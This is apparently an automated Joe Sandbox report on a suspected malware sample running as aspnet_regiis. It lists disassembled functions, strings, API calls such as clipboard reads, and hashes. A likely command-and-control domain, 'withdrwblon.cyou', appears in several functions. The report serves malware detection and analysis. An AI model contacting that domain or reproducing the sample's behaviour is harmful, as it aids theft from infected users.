API ID: CreateInstance
String ID: :$r}$s"$x
API String ID: 542301482-3244239955
Opcode ID: 12027665fc46fc99237387bd05bf5e42d2430f3ea548d50015b37a4fee4069c6
Instruction ID: b89a4d32d863366d2a2e874416df693a4ee578c9a8869304b9575e30f1124fa8
Opcode Fuzzy Hash: 12027665fc46fc99237387bd05bf5e42d2430f3ea548d50015b37a4fee4069c6
Instruction Fuzzy Hash: 9C319C765183059BD320CF59C945B4FBBE4EBC6744F118A2CF5D4AB290CBB89905CB93

Function 75A7E1A0 Relevance: 6.8, Strings: 5, Instructions: 540
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

n|of, xrefs: 75A7E6A7
txLL, xrefs: 75A7E697
withdrwblon.cyou, xrefs: 75A7E44E
Ehrd, xrefs: 75A7E68F
i[k], xrefs: 75A7E4C3

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: Ehrd$i[k]$n|of$txLL$withdrwblon.cyou
API String ID: 0-1890062271
Opcode ID: 88b4934375fcc0d57674e875ab6e15c584e96a8103cef7c88bc05edb36cf558f
Instruction ID: f46ee03ae37d901dc039a2d66ea59f5e1198481a3d38bf2b02081c5b13ea9419
Opcode Fuzzy Hash: 88b4934375fcc0d57674e875ab6e15c584e96a8103cef7c88bc05edb36cf558f
Instruction Fuzzy Hash: 310217B69183418FD300CF25D981B6FBBF5EB95304F18493CF4959B365EB35890A8B92

Function 75A8104F Relevance: 2.9, APIs: 2, Instructions: 377
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 75A81378
CoUninitialize.OLE32 ref: 75A814A8

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: Uninitialize
String ID:
API String ID: 3861434553-0
Opcode ID: 37d1bd5693a841aa7cdcb03e06adeec5613ac5fd35dc3a866c11c206029058d9
Instruction ID: fab302ded815c543b76ffeb474f53e1c1309cbb293bc1fb6cbacbdfcf6fd312b
Opcode Fuzzy Hash: 37d1bd5693a841aa7cdcb03e06adeec5613ac5fd35dc3a866c11c206029058d9
Instruction Fuzzy Hash: 9BB139B5B007408BE7059F319D91F2B77E2AF85214F08493CD8475B7AAEF39E80587A6

Function 75A8D7F8 Relevance: 1.9, APIs: 1, Instructions: 413
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a0745a6b28a1aa32a3568df258031fe3159cf4b90329836fe9e1bb794b1fd7c
Instruction ID: abeae28b53849e032638f3ca05c52867a9dd71f08875ec0545271a8ec70f5892
Opcode Fuzzy Hash: 3a0745a6b28a1aa32a3568df258031fe3159cf4b90329836fe9e1bb794b1fd7c
Instruction Fuzzy Hash: 24D1DEB59047418FD7258F29C880B13BBF2FB49210F188979D4AB8B75AE734F846CB51

Function 75AAE210 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 75AAE2A1

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 497b275afa8965c853019fac81af5c70f1980981b510affbd86f4111b2835645
Instruction ID: e4886787332d85f07ca4cfff016cfc36cb64e5e215266951b4ad2b3b1740b5cd
Opcode Fuzzy Hash: 497b275afa8965c853019fac81af5c70f1980981b510affbd86f4111b2835645
Instruction Fuzzy Hash: E5114877E552108FD3108E69DCA1B5ABB67EBDA311F2A053DD8805B680CA385807CBD1

Function 75AB0F10 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(75AB46AD,005C003F,00000006,?,?,00000018,?,?,?), ref: 75AB0F3E

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 75AB4C40 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 75AB4CA9

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 6792bcd89f249922ee7bb22deef5eaac33602a472f6d3d87cd1330266b6ab2d0
Instruction ID: 80c5eef80d45f61094f534b87641c3d771960ecb938f112bbf6ba6ba325ca10f
Opcode Fuzzy Hash: 6792bcd89f249922ee7bb22deef5eaac33602a472f6d3d87cd1330266b6ab2d0
Instruction Fuzzy Hash: 9B31F6725083049BD314DF68D4D1A6FBBFAFB89354F14893CE69687384D7789448CBA2

Function 75A9AB20 Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 259a888e01bbd88c68d3d0ad6d215a5fea6d141f973eb02715861de158d53e69
Instruction ID: d6a4a39069d2955fe1a9dbc54fae22223da874575351bc5221f681bb9867eef2
Opcode Fuzzy Hash: 259a888e01bbd88c68d3d0ad6d215a5fea6d141f973eb02715861de158d53e69
Instruction Fuzzy Hash: 2CD16A727483214BD709CE288881B9B77E2FFC9254F04853EE8D64B399EB34DD0A8795

Function 75A80CA0 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 306
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 75A80CB2

Strings

7AD3DC8FF7DBC4F14647770884DC5F3B, xrefs: 75A80CC8
Mz, xrefs: 75A80E63
withdrwblon.cyou, xrefs: 75A80FA4
tO, xrefs: 75A80E55

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: InitializeSecurity
String ID: 7AD3DC8FF7DBC4F14647770884DC5F3B$Mz$tO$withdrwblon.cyou
API String ID: 640775948-1558530767
Opcode ID: 21881290def1ef8bca6dc5d42d36e7dd62fafcf10c66477e9e8ecfb0c3f6b415
Instruction ID: 9725a80443126c9390d5f47593f85473f1c71bf5cd91399f226442a79638100e
Opcode Fuzzy Hash: 21881290def1ef8bca6dc5d42d36e7dd62fafcf10c66477e9e8ecfb0c3f6b415
Instruction Fuzzy Hash: 3EA1F3B55047818FD326CF25C490B66BBE2FF46304F2889ACD0E64B75AD735E446CB91

Function 75A9B070 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

57, xrefs: 75A9BB53
`c, xrefs: 75A9BC99
/~, xrefs: 75A9C2D8

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: /~$`c$57
API String ID: 0-484455979
Opcode ID: 01f330540036f2545d88e65f4f5a617650b6530f53045063e0ffc9570a4029f0
Instruction ID: 60b9939eba05ebd46c450bf694805c515e32db622b6205877a9338de56f53ab7
Opcode Fuzzy Hash: 01f330540036f2545d88e65f4f5a617650b6530f53045063e0ffc9570a4029f0
Instruction Fuzzy Hash: 1AB1DEB5D0032CDBDB249F65DC52B9EBBB5FF06304F1041A9D44AAB244DB344A86CFA6

Function 75A80B90 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 75A80C8C

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 767589e960f2663bc4fef1474a342ec9cdc0fd425a30e69b0c9205b9f7c7d259
Instruction ID: 8ffa9d37b3e5953fe3f6b8d101a964e3708b712e7bb9df427f2fb1cf69aa394a
Opcode Fuzzy Hash: 767589e960f2663bc4fef1474a342ec9cdc0fd425a30e69b0c9205b9f7c7d259
Instruction Fuzzy Hash: 5031DBB5C10B40ABD770BA3D8A0B6177EB4A701660F50472DF8F69A6D4F230A4298BD7

Function 75AAE1B0 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 75AAE204

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6af8ab53fb3e366870d7436afc51fa92b58594ef25ddb56bf53154b29f9717c6
Instruction ID: a8c44bb45718f74c3c76a621cf9065ed10c92a9abda3cd894f2ddd603e245e71
Opcode Fuzzy Hash: 6af8ab53fb3e366870d7436afc51fa92b58594ef25ddb56bf53154b29f9717c6
Instruction Fuzzy Hash: 16F0E97429D3505BE3088B10DCA1B1D7FA6ABE1304F18487EE4D107381C27A181ED777

Non-executed Functions

Function 75A8FBA0 Relevance: 17.8, Strings: 13, Instructions: 1566COMMON

Download Yara Rule

Strings

h, xrefs: 75A90742
8;:5, xrefs: 75A8FFFB
RdOh, xrefs: 75A90F94
w`k, xrefs: 75A9061A
4761, xrefs: 75A90006
X[Z], xrefs: 75A8FFBD
L, xrefs: 75A903B5
&?3, xrefs: 75A8FDA5
3210, xrefs: 75A8FDB0
,/.1, xrefs: 75A90095
dgfi, xrefs: 75A8FFD5
mdOh, xrefs: 75A90FCA
8?, xrefs: 75A90A19

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: &?3$,/.1$3210$4761$8;:5$8?$L$RdOh$X[Z]$dgfi$h$mdOh$w`k
API String ID: 0-3944949542
Opcode ID: ef982bca14b4818c586ad39468e1bef59c362d60823ecd608849fb9504286adb
Instruction ID: e7ebe54ab2de937e38d670b3e9cd5ab2f0da76f03908448927e26488df443d33
Opcode Fuzzy Hash: ef982bca14b4818c586ad39468e1bef59c362d60823ecd608849fb9504286adb
Instruction Fuzzy Hash: 3EB2DF7160C3918BD329CF25C490BABBBE2BFCA344F14893DE4DA8B295D7748505CB96

Function 75AA6B70 Relevance: 9.2, APIs: 6, Instructions: 161clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 75AA6B92
GetWindowLongW.USER32 ref: 75AA6BBD
GetClipboardData.USER32 ref: 75AA6BCD
CloseClipboard.USER32 ref: 75AA6D5B

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID:
API String ID: 1647500905-0
Opcode ID: de474bb34f8666e2af9faa1ad98b8f134f0766b3196945a7ec62de9b92954244
Instruction ID: 5f27699f619b01f66a37e5a120bd69e810de920dd3d3fa3fbfe2c54e111b9b22
Opcode Fuzzy Hash: de474bb34f8666e2af9faa1ad98b8f134f0766b3196945a7ec62de9b92954244
Instruction Fuzzy Hash: AF5106B2D08A928BE701DB7CC44875EBFF1AB41210F05863DC8A497689E7799954CBD3

Function 75A8E837 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 292threadCOMMON

Download Yara Rule

APIs

FindWindowExW.USER32(00000000,F361F56A,?,00000000), ref: 75A8E92F
GetWindowThreadProcessId.USER32(F361F56A,00000000), ref: 75A8E9CC

Strings

OO, xrefs: 75A8E89F
|U, xrefs: 75A8E8A6
Ex, xrefs: 75A8E8AD

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: Window$FindProcessThread
String ID: Ex$OO$|U
API String ID: 3928697162-1176901884
Opcode ID: 63d62073321e610d9cace7445d121e38a049a6971846708dea31e1257b0f4f67
Instruction ID: 79d421adc9fb3afb4f010c3ef426958388302b0ebabedf6c5b7ceade6192a623
Opcode Fuzzy Hash: 63d62073321e610d9cace7445d121e38a049a6971846708dea31e1257b0f4f67
Instruction Fuzzy Hash: 55B17871600B00CFD321CF29C890B16B7F2FF59310F148A6CE59B8B6A5DB74A902CB91

Function 75A998F2 Relevance: 7.8, Strings: 6, Instructions: 303COMMON

Download Yara Rule

Strings

UjcW, xrefs: 75A99C53
YRTP, xrefs: 75A99C5E
o$ , xrefs: 75A99C7F
$*- , xrefs: 75A99C74
#g>#, xrefs: 75A99C95
Y^S, xrefs: 75A99ADD, 75A99AF0

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: Y^S$#g>#$$*- $UjcW$YRTP$o$
API String ID: 0-2638604102
Opcode ID: 41e80d4820de3a0ef2216c60ae84434fb3ed5820af81bbe1b64a85bb9c71c6d8
Instruction ID: 9f4c70bb87bd7508357756a6ab31dce7bf1a2c8297e6a2c2e3bdf8596960ce00
Opcode Fuzzy Hash: 41e80d4820de3a0ef2216c60ae84434fb3ed5820af81bbe1b64a85bb9c71c6d8
Instruction Fuzzy Hash: 90A15D3164C3A18FD329CB688491F97BBE5EF55290F048A3DC8E64B39AC7349809D756

Function 75AA6D70 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 75AA6DB2
GetSystemMetrics.USER32 ref: 75AA6DC2

Strings

+DAM, xrefs: 75AA6EF9
, xrefs: 75AA6EAF

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: MetricsSystem
String ID: $+DAM
API String ID: 4116985748-1669358363
Opcode ID: aa6b3bb15ad187f2fabefca98210ec29417dfb415e895a054ae3930a9dfb3042
Instruction ID: af1a91615a91355bf1cf2fd6cf93a1f7bbe6b8d6352661b36239b8154dbb9e90
Opcode Fuzzy Hash: aa6b3bb15ad187f2fabefca98210ec29417dfb415e895a054ae3930a9dfb3042
Instruction Fuzzy Hash: 2C91B0B01193818FDBA0DF19C451B8FBBF4BB85344F208A2DE5988B358C7B89444CF86

Function 75A9702F Relevance: 7.0, Strings: 5, Instructions: 730COMMON

Download Yara Rule

Strings

~x||, xrefs: 75A970EF
:?-), xrefs: 75A9715F
3768, xrefs: 75A97157
i7b0, xrefs: 75A9714F
InA>, xrefs: 75A970D0

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 3768$:?-)$InA>$i7b0$~x||
API String ID: 0-482665311
Opcode ID: 86371cf740db7f929527a923a55ea3885880ebe8d6ce7a7e1596ee8da52f76c9
Instruction ID: 8900265d7620b5ad6eddf9b33e7601367b7e21a7371b09f3ae3e3d0eac572a9d
Opcode Fuzzy Hash: 86371cf740db7f929527a923a55ea3885880ebe8d6ce7a7e1596ee8da52f76c9
Instruction Fuzzy Hash: F8320532618315CFD318CF29C890B2AB7E1FB89310F19897CE99697394DB39E911CB95

Function 75AAF020 Relevance: 6.9, Strings: 5, Instructions: 644COMMON

Download Yara Rule

Strings

InA>, xrefs: 75AAF380
8977, xrefs: 75AAF1BE
f, xrefs: 75AAF244
InA>, xrefs: 75AAF0C0
"#<, xrefs: 75AAF154

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID: "#<$8977$InA>$InA>$f
API String ID: 2994545307-3216925240
Opcode ID: 5ef71bfc1348bd1168d21b735b7c580611ffbda287be0dce0d0603dc5c91d218
Instruction ID: 3c5cc7cd3da79c48a26d7a15a71431050e539cb1822034722d4d8b97dd49e64d
Opcode Fuzzy Hash: 5ef71bfc1348bd1168d21b735b7c580611ffbda287be0dce0d0603dc5c91d218
Instruction Fuzzy Hash: BF22A5766083429FC709CF15C890E2ABBF2BBC8354F148A3EE5A687395D734D846CB52

Function 75A8E07E Relevance: 4.3, Strings: 3, Instructions: 523COMMON

Download Yara Rule

Strings

OO, xrefs: 75A8E89F
|U, xrefs: 75A8E8A6
Ex, xrefs: 75A8E8AD

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: Ex$OO$|U
API String ID: 0-1176901884
Opcode ID: 5bdc09f63b2d085f2df576d63c35f06bf461fa1912f6e24506e68a47ee2a2f35
Instruction ID: 8cc31db268383b95f15a56a8cb9714539f31903f0c2a1ae8d5cafc552213d663
Opcode Fuzzy Hash: 5bdc09f63b2d085f2df576d63c35f06bf461fa1912f6e24506e68a47ee2a2f35
Instruction Fuzzy Hash: AFF1DF35210B00DFE3568F25C990F2A77A2FB99320F64593CE5A747AA9D775F842CB40

Function 75A92520 Relevance: 3.2, Strings: 2, Instructions: 672COMMON

Download Yara Rule

Strings

c], xrefs: 75A92537
$96w, xrefs: 75A92730

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID: $96w$c]
API String ID: 2994545307-247510824
Opcode ID: e309a6db480f4c68273519aef73dfaf74bb1d5712ff5f06cc7fc19a4d9bec80f
Instruction ID: 5e38c24e45e788975fa2a3ae762741b0564d5bddce2fa935d6171a5d99f71141
Opcode Fuzzy Hash: e309a6db480f4c68273519aef73dfaf74bb1d5712ff5f06cc7fc19a4d9bec80f
Instruction Fuzzy Hash: EF22D1756083519BD728CF24C990F6FB7E2FFD8350F11883CE99A8B298D77298058B56

Function 75A814CE Relevance: 2.8, Strings: 2, Instructions: 257COMMON

Download Yara Rule

Strings

Noni, xrefs: 75A8159E
f[zU, xrefs: 75A81589

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

